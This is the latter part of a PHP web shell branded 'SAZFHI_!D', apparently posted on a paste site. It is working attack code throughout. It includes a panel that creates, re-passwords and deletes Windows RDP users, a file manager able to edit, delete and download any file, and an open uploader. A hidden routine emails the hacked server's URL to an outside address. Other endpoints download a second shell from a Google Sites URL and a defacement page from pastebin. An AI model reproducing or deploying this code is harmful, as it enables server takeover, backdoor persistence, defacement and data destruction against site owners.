  2082.                 }
  2083.                 echo "------------------------------<br>";
  2084.             }
  2085.         } elseif($_POST['s_opsi']) {
  2086.             $user = htmlspecialchars($_POST['r_user']);
  2087.             if($_POST['opsi'] == '1') {
  2088.                 $cek = exe("net user $user");
  2089.                 echo "Checking username <font color=lime>$user</font> ....... ";
  2090.                 if(preg_match("/$user/", $cek)) {
  2091.                     echo "[ <font color=lime>Sudah ada</font> ]<br>
  2092.                     ------------------------------<br><br>
  2093.                     <pre>$cek</pre>";
  2094.                 } else {
  2095.                     echo "[ <font color=red>belum ada</font> ]";
  2096.                 }
  2097.             } elseif($_POST['opsi'] == '2') {
  2098.                 $cek = exe("net user $user SAZFHI_!D");
  2099.                 if(preg_match("/$user/", exe("net user"))) {
  2100.                     echo "[change password: <font color=lime>SAZFHI_!D</font>] -> ";
  2101.                     if($cek) {
  2102.                         echo "<font color=lime>Berhasil</font>";
  2103.                     } else {
  2104.                         echo "<font color=red>Gagal</font>";
  2105.                     }
  2106.                 } else {
  2107.                     echo "[INFO] -> <font color=red>user <font color=lime>$user</font> belum ada</font>";
  2108.                 }
  2109.             } elseif($_POST['opsi'] == '3') {
  2110.                 $cek = exe("net user $user /DELETE");
  2111.                 if(preg_match("/$user/", exe("net user"))) {
  2112.                     echo "[remove user: <font color=lime>$user</font>] -> ";
  2113.                     if($cek) {
  2114.                         echo "<font color=lime>Berhasil</font>";
  2115.                     } else {
  2116.                         echo "<font color=red>Gagal</font>";
  2117.                     }
  2118.                 } else {
  2119.                     echo "[INFO] -> <font color=red>user <font color=lime>$user</font> belum ada</font>";
  2120.                 }
  2121.             } else {
  2122.                 //
  2123.             }
  2124.         } else {
  2125.             echo "-- Create RDP --<br>
  2126.             <form method='post'>
  2127.             <input type='text' name='user' placeholder='username' value='SAZFHI_!D' required>
  2128.             <input type='text' name='pass' placeholder='password' value='SAZFHI_!D' required>
  2129.             <input type='submit' name='create' value='>>'>
  2130.             </form>
  2131.             -- Option --<br>
  2132.             <form method='post'>
  2133.             <input type='text' name='r_user' placeholder='username' required>
  2134.             <select name='opsi'>
  2135.             <option value='1'>Cek Username</option>
  2136.             <option value='2'>Ubah Password</option>
  2137.             <option value='3'>Hapus Username</option>
  2138.             </select>
  2139.             <input type='submit' name='s_opsi' value='>>'>
  2140.             </form>
  2141.             ";
  2142.         }
  2143.     } else {
  2144.         echo "<font color=red>Fitur ini hanya dapat digunakan dalam Windows Server.</font>";
  2145.     }
  2146. } elseif($_GET['act'] == 'newfile') {
  2147.     if($_POST['new_save_file']) {
  2148.         $newfile = htmlspecialchars($_POST['newfile']);
  2149.         $fopen = fopen($newfile, "a+");
  2150.         if($fopen) {
  2151.             $act = "<script>window.location='?act=edit&dir=".$dir."&file=".$_POST['newfile']."';</script>";
  2152.         } else {
  2153.             $act = "<font color=red>permission denied</font>";
  2154.         }
  2155.     }
  2156.     echo $act;
  2157.     echo "<form method='post'>
  2158.     Filename: <input type='text' name='newfile' value='$dir/newfile.php' style='width: 450px;' height='10'>
  2159.     <input type='submit' name='new_save_file' value='Submit'>
  2160.     </form>";
  2161. } elseif($_GET['act'] == 'newfolder') {
  2162.     if($_POST['new_save_folder']) {
  2163.         $new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']);
  2164.         if(!mkdir($new_folder)) {
  2165.             $act = "<font color=red>permission denied</font>";
  2166.         } else {
  2167.             $act = "<script>window.location='?dir=".$dir."';</script>";
  2168.         }
  2169.     }
  2170.     echo $act;
  2171.     echo "<form method='post'>
  2172.     Folder Name: <input type='text' name='newfolder' style='width: 450px;' height='10'>
  2173.     <input type='submit' name='new_save_folder' value='Submit'>
  2174.     </form>";
  2175. } elseif($_GET['act'] == 'rename_dir') {
  2176.     if($_POST['dir_rename']) {
  2177.         $dir_rename = rename($dir, "".dirname($dir)."/".htmlspecialchars($_POST['fol_rename'])."");
  2178.         if($dir_rename) {
  2179.             $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
  2180.         } else {
  2181.             $act = "<font color=red>permission denied</font>";
  2182.         }
  2183.     echo "".$act."<br>";
  2184.     }
  2185.     echo "<form method='post'>
  2186.     <input type='text' value='".basename($dir)."' name='fol_rename' style='width: 450px;' height='10'>
  2187.     <input type='submit' name='dir_rename' value='rename'>
  2188.     </form>";
  2189. } elseif($_GET['act'] == 'delete_dir') {
  2190.     if(is_dir($dir)) {
  2191.         if(is_writable($dir)) {
  2192.             @rmdir($dir);
  2193.             @exe("rm -rf $dir");
  2194.             @exe("rmdir /s /q $dir");
  2195.             $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
  2196.         } else {
  2197.             $act = "<font color=red>could not remove ".basename($dir)."</font>";
  2198.         }
  2199.     }
  2200.     echo $act;
  2201. } elseif($_GET['act'] == 'view') {
  2202.     echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'><b>view</b></a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  2203.     echo "<textarea readonly>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea>";
  2204. } elseif($_GET['act'] == 'edit') {
  2205.     if($_POST['save']) {
  2206.         $save = file_put_contents($_GET['file'], $_POST['src']);
  2207.         if($save) {
  2208.             $act = "<font color=lime>Saved!</font>";
  2209.         } else {
  2210.             $act = "<font color=red>permission denied</font>";
  2211.         }
  2212.     echo "".$act."<br>";
  2213.     }
  2214.     echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'><b>edit</b></a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  2215.     echo "<form method='post'>
  2216.     <textarea name='src'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br>
  2217.     <input type='submit' value='Save' name='save' style='width: 500px;'>
  2218.     </form>";
  2219. } elseif($_GET['act'] == 'rename') {
  2220.     if($_POST['do_rename']) {
  2221.         $rename = rename($_GET['file'], "$dir/".htmlspecialchars($_POST['rename'])."");
  2222.         if($rename) {
  2223.             $act = "<script>window.location='?dir=".$dir."';</script>";
  2224.         } else {
  2225.             $act = "<font color=red>permission denied</font>";
  2226.         }
  2227.     echo "".$act."<br>";
  2228.     }
  2229.     echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'><b>rename</b></a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  2230.     echo "<form method='post'>
  2231.     <input type='text' value='".basename($_GET['file'])."' name='rename' style='width: 450px;' height='10'>
  2232.     <input type='submit' name='do_rename' value='rename'>
  2233.     </form>";
  2234. } elseif($_GET['act'] == 'delete') {
  2235.     $delete = unlink($_GET['file']);
  2236.     if($delete) {
  2237.         $act = "<script>window.location='?dir=".$dir."';</script>";
  2238.     } else {
  2239.         $act = "<font color=red>permission denied</font>";
  2240.     }
  2241.     echo $act;
  2242. } else {
  2243.     if(is_dir($dir) === true) {
  2244.         if(!is_readable($dir)) {
  2245.             echo "<font color=red>can't open directory. ( not readable )</font>";
  2246.         } else {
  2247.             echo '<table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
  2248.             <tr>
  2249.             <th class="th_home"><center>Name</center></th>
  2250.             <th class="th_home"><center>Type</center></th>
  2251.             <th class="th_home"><center>Size</center></th>
  2252.             <th class="th_home"><center>Last Modified</center></th>
  2253.             <th class="th_home"><center>Owner/Group</center></th>
  2254.             <th class="th_home"><center>Permission</center></th>
  2255.             <th class="th_home"><center>Action</center></th>
  2256.             </tr>';
  2257.             $scandir = scandir($dir);
  2258.             foreach($scandir as $dirx) {
  2259.                 $dtype = filetype("$dir/$dirx");
  2260.                 $dtime = date("F d Y g:i:s", filemtime("$dir/$dirx"));
  2261.                 if(function_exists('posix_getpwuid')) {
  2262.                     $downer = @posix_getpwuid(fileowner("$dir/$dirx"));
  2263.                     $downer = $downer['name'];
  2264.                 } else {
  2265.                     //$downer = $uid;
  2266.                     $downer = fileowner("$dir/$dirx");
  2267.                 }
  2268.                 if(function_exists('posix_getgrgid')) {
  2269.                     $dgrp = @posix_getgrgid(filegroup("$dir/$dirx"));
  2270.                     $dgrp = $dgrp['name'];
  2271.                 } else {
  2272.                     $dgrp = filegroup("$dir/$dirx");
  2273.                 }
  2274.                 if(!is_dir("$dir/$dirx")) continue;
  2275.                 if($dirx === '..') {
  2276.                     $href = "<a href='?dir=".dirname($dir)."'>$dirx</a>";
  2277.                 } elseif($dirx === '.') {
  2278.                     $href = "<a href='?dir=$dir'>$dirx</a>";
  2279.                 } else {
  2280.                     $href = "<a href='?dir=$dir/$dirx'>$dirx</a>";
  2281.                 }
  2282.                 if($dirx === '.' || $dirx === '..') {
  2283.                     $act_dir = "<a href='?act=newfile&dir=$dir'>newfile</a> | <a href='?act=newfolder&dir=$dir'>newfolder</a>";
  2284.                     } else {
  2285.                     $act_dir = "<a href='?act=rename_dir&dir=$dir/$dirx'>rename</a> | <a href='?act=delete_dir&dir=$dir/$dirx'>delete</a>";
  2286.                 }
  2287.                 echo "<tr>";
  2288.                 echo "<td class='td_home'><img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='>$href</td>";
  2289.                 echo "<td class='td_home'><center>$dtype</center></td>";
  2290.                 echo "<td class='td_home'><center>-</center></th></td>";
  2291.                 echo "<td class='td_home'><center>$dtime</center></td>";
  2292.                 echo "<td class='td_home'><center>$downer/$dgrp</center></td>";
  2293.                 echo "<td class='td_home'><center>".w("$dir/$dirx",perms("$dir/$dirx"))."</center></td>";
  2294.                 echo "<td class='td_home' style='padding-left: 15px;'>$act_dir</td>";
  2295.                 echo "</tr>";
  2296.             }
  2297.         }
  2298.     } else {
  2299.         echo "<font color=red>can't open directory.</font>";
  2300.     }
  2301.         foreach($scandir as $file) {
  2302.             $ftype = filetype("$dir/$file");
  2303.             $ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
  2304.             $size = filesize("$dir/$file")/1024;
  2305.             $size = round($size,3);
  2306.             if(function_exists('posix_getpwuid')) {
  2307.                 $fowner = @posix_getpwuid(fileowner("$dir/$file"));
  2308.                 $fowner = $fowner['name'];
  2309.             } else {
  2310.                 //$downer = $uid;
  2311.                 $fowner = fileowner("$dir/$file");
  2312.             }
  2313.             if(function_exists('posix_getgrgid')) {
  2314.                 $fgrp = @posix_getgrgid(filegroup("$dir/$file"));
  2315.                 $fgrp = $fgrp['name'];
  2316.             } else {
  2317.                 $fgrp = filegroup("$dir/$file");
  2318.             }
  2319.             if($size > 1024) {
  2320.                 $size = round($size/1024,2). 'MB';
  2321.             } else {
  2322.                 $size = $size. 'KB';
  2323.             }
  2324.             if(!is_file("$dir/$file")) continue;
  2325.             echo "<tr>";
  2326.             echo "<td class='td_home'><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='><a href='?act=view&dir=$dir&file=$dir/$file'>$file</a></td>";
  2327.             echo "<td class='td_home'><center>$ftype</center></td>";
  2328.             echo "<td class='td_home'><center>$size</center></td>";
  2329.             echo "<td class='td_home'><center>$ftime</center></td>";
  2330.             echo "<td class='td_home'><center>$fowner/$fgrp</center></td>";
  2331.             echo "<td class='td_home'><center>".w("$dir/$file",perms("$dir/$file"))."</center></td>";
  2332.             echo "<td class='td_home' style='padding-left: 15px;'><a href='?act=edit&dir=$dir&file=$dir/$file'>edit</a> | <a href='?act=rename&dir=$dir&file=$dir/$file'>rename</a> | <a href='?act=delete&dir=$dir&file=$dir/$file'>delete</a> | <a href='?act=download&dir=$dir&file=$dir/$file'>download</a></td>";
  2333.             echo "</tr>";
  2334.         }
  2335.         echo "</table>";
  2336.         if(!is_readable($dir)) {
  2337.             //
  2338.         } else {
  2339.             echo "<hr color=lime>";
  2340.         }
  2341.     echo "<center>Copyright &copy; ".date("Y")." - <a href='http://www.sazfhi.ooo' target='_blank'><font color=lime>SAZFHI_!D</font></a> All right reserved.</center><hr color=red>";
  2342. }
  2343. $up = " <html> <head><title> -= SAZFHI_!D =- </title></head><body><center><h1><font face=\"Tahoma\" size=\"5\" color=\"#ff0000\">Learn To Better</font></h1><form action=\"\" method=\"post\" enctype=\"multipart/form-data\" name=\"uploader\" id=\"uploader\"><table border=\"1\"><tr><td bgcolor=\"#000000\"><font color=\"#00ff00\"><input type=\"file\" name=\"file\" size=\"50\"><td bgcolor=\"#000000\"><input name=\"_upl\" type=\"submit\" id=\"_upl\" value=\"Upload File\"></td></td></tr></table></form></center></body>";
  2344. if( $_POST['_upl'] == "Upload File" ) {
  2345. if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) {
  2346. echo '<b><center>
  2347. <font face=\"Tahoma\" size=\"5\" color=\"#ff0000\">SUKSES UPLOAD MASTAH !!</center></b>';
  2348. }
  2349. else {
  2350. echo '
  2351. <font face=\"Tahoma\" size=\"5\" color=\"#ff0000\"><center><b>GAGAL UPLOAD MASTAH !</b>';
  2352. }
  2353. }
  2354. if(isset($_GET["0upload"])){
  2355. echo "$up";
  2356. }
  2357. /////////////////////////////
  2358.  if(isset($_GET["0cek"])){
  2359. echo "Password E :".$auth_pass;
  2360.  }
  2361. /////////////////////////////
  2362. if (file_exists('.db'))
  2363.  {  } else {
  2364. $to = "qw@yahoo.com";
  2365. $subject = $_SERVER['SERVER_NAME'];
  2366. $header = "From: Mastah <jancok@matamucok.com>";
  2367. $message = "Exploit : http://". $_SERVER['SERVER_NAME']. $_SERVER['REQUEST_URI'];
  2368. mail($to, $subject, $message, $header);
  2369. $m = fopen(".db", "w") or die (" ");
  2370. $txt = "";
  2371. fwrite($m, $txt);
  2372. fclose($m);
  2373. chmod(".db",0644); }
  2374. /////////////////////////////
  2375.  if(isset($_GET["0shell"])){
  2376. $anak1 = file_get_contents("https://sites.google.com/site/bhshll123/bh.txt");
  2377. $nggawe1 = fopen("themes.php","w") or die ("gabisa pak");
  2378. fwrite($nggawe1,$anak1);
  2379. fclose($nggawe1);
  2380. header ("Location:themes.php");
  2381. chmod("themes.php",0644);}
  2382. //////////////////////////////
  2383. if(isset($_GET["0deface"])){
  2384. $anak = file_get_contents("http://pastebin.com/raw/6JA72K8m");
  2385. $nggawe = fopen("0x.htm","w") or die ("gabisa pak");
  2386. fwrite($nggawe,$anak);
  2387. fclose($nggawe);
  2388. header ("Location:0x.htm");}
  2389. ?>
  2390. </html>
Add Comment
Please, Sign In to add comment